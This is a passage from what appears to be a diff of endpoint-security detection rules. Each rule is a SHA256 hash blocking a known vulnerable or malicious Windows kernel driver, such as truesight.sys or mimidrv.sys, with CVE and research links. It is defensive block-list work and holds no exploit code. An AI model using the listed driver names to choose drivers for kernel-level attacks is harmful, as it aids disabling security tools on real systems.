+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9b96740ab510dc69fab798877b0c3e1cef1599c55eb290c4bc439997263c5f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f380e67c-48ea-5862-b52c-5ffa314fa187",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470281Z",
+ "creation_date": "2026-03-23T11:45:30.470285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e171be5cf5cc1f74ec346a1ab0dfaa38c16da6b4265eed710a3faabfc13b9d56",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f38517ca-86f3-5b0e-b45d-26b107cd1e84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488205Z",
+ "creation_date": "2026-03-23T11:45:31.488207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19c539073d670babad2182d19b1f1109b33efece3c215616468ff9f3611619a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f38ddd69-b2c6-54f4-8835-ff067d1b7805",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146248Z",
+ "creation_date": "2026-03-23T11:45:32.146251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146259Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea7440064405fb9d4bb63876905f14beb70b0b01d26a7ea9b9d25c00932c8cca",
+ "comment": "Malicious Kernel Driver (aka driver_b4f33ffe.sys) [https://www.loldrivers.io/drivers/51a44484-8bcc-4150-8b94-4a755cff0af8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f38e9dc3-712e-57e8-8138-2fd587cddb17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613770Z",
+ "creation_date": "2026-03-23T11:45:29.613772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f39fb600-8c5e-59c0-8f19-50e4565bd9ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144651Z",
+ "creation_date": "2026-03-23T11:45:31.144654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79bef3d6fda11d3622c526f416b837b6c437eaede7466c0fdbe0bcebd9f13d14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3a20967-2145-5ec5-adec-9e70a6d1d664",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969836Z",
+ "creation_date": "2026-03-23T11:45:29.969838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bc755f3e24023d931c637b4c734ae3a4d50567c87fd025114e0520413721751",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3a370b0-7d2d-56b7-8fe4-16dcfa108ad8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975587Z",
+ "creation_date": "2026-03-23T11:45:29.975589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab0925398f3fa69a67eacee2bbb7b34ac395bb309df7fc7a9a9b8103ef41ed7a",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3a3f928-f683-549a-86fd-428e4c194264",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974748Z",
+ "creation_date": "2026-03-23T11:45:29.974750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c264c3d71a57a5dff031d74bd2f6ef715eff603cc8078df123e862603e096be4",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3a95707-1745-5a35-ad4a-df0142499e98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146396Z",
+ "creation_date": "2026-03-23T11:45:32.146398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ffb4081fe867c98118e472538e8a3e6feac2a9d80b5ae2d4e2b621b344cd6d9",
+ "comment": "Malicious Kernel Driver (aka driver_0ffb4081.sys) [https://www.loldrivers.io/drivers/8081b0d0-e18e-474a-bdfa-8ff1956d90cb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3af80c6-9688-5eb7-a0a0-9633faaeee90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819464Z",
+ "creation_date": "2026-03-23T11:45:30.819466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819471Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "848b150ffcf1301b26634a41f28deacb5ccdd3117d79b590d515ed49849b8891",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3c21312-3d6c-58dd-a1e9-fca63aeb0916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818108Z",
+ "creation_date": "2026-03-23T11:45:31.818112Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae91be2d3f55e3012ed209cf55d180a263be25df9494710d2d2bcbdb3e970e26",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3dcb130-f1d0-5ddf-9b80-023a9726a56b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479222Z",
+ "creation_date": "2026-03-23T11:45:30.479224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "035b96ff8b85d312be0f9df6271714392a802ec8bab59ae8229812ddc67ced5a",
+ "comment": "Vulnerable Kernel Driver (aka directio32_legacy.sys) [https://www.loldrivers.io/drivers/7a0842ca-1a64-4ad1-9d66-25eb983d1742/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3df6038-84ff-55a2-af8c-6edaabf4d318",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824487Z",
+ "creation_date": "2026-03-23T11:45:30.824490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824497Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56e55585c72d5e0d8418c5dff56054e130e3b34d8acc0320c79b78edce5ab410",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3e23a75-a2cd-5881-9b90-ad67f05af6ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484688Z",
+ "creation_date": "2026-03-23T11:45:31.484691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96f6af3a7cb383be7c1271775fcf2c9eb517a37172c11caa629a05cc322308c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3f4ede9-6f95-5629-bac5-a661597b98a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144503Z",
+ "creation_date": "2026-03-23T11:45:32.144505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75aa0f984fdc2d0e1db632b65fbec424a87a8c68a822fca1e503a269eba71f2d",
+ "comment": "Malicious Kernel Driver (aka driver_fdd16a94.sys) [https://www.loldrivers.io/drivers/da066835-f37c-40bf-86bb-d77ad45c7f30/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3f7e3c4-767f-5263-8dcf-5fc30cf35559",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453490Z",
+ "creation_date": "2026-03-23T11:45:30.453493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b5ef4b48a5b23818e84e415c70bd7058f665cb7cba379d05da689e1cbe1148e",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3f8530e-1443-57c2-a2ab-d19e50a9e518",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620917Z",
+ "creation_date": "2026-03-23T11:45:29.620919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f3fde89d-b46d-5752-bb41-1da9f641aa53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461155Z",
+ "creation_date": "2026-03-23T11:45:30.461158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e94d4e6d903e98f60c240dc841dcace5f9e8bbb0802e6648a49ab80c23318cb",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f406c5dc-72db-556c-a2e4-ca7c0f8ffecd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819934Z",
+ "creation_date": "2026-03-23T11:45:31.819937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819946Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8db20ae3737c397c8fb079eaeace0f374e1602adc781a948f9172862cc01198e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f41d3378-6fa6-5041-bc0e-3bf5dffd099b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476177Z",
+ "creation_date": "2026-03-23T11:45:31.476181Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b699cb45b365f537c2bc4fef0ac2837586c1fd3f0986835ad182183a5c39927",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f4262759-77f2-5d3d-a927-229f4a0272ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614093Z",
+ "creation_date": "2026-03-23T11:45:29.614095Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614100Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7d4943ddac34e1a38692c624d799e634ad4c4e3ae7e3bb2ae4cf0d8eb8985bc",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f426f4a3-811d-5ff9-b345-cc7977d70f84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814718Z",
+ "creation_date": "2026-03-23T11:45:31.814722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac1c07a4fb4f034b91dd52083113f06baf89e85eb95ff4e8594b402237b08ef5",
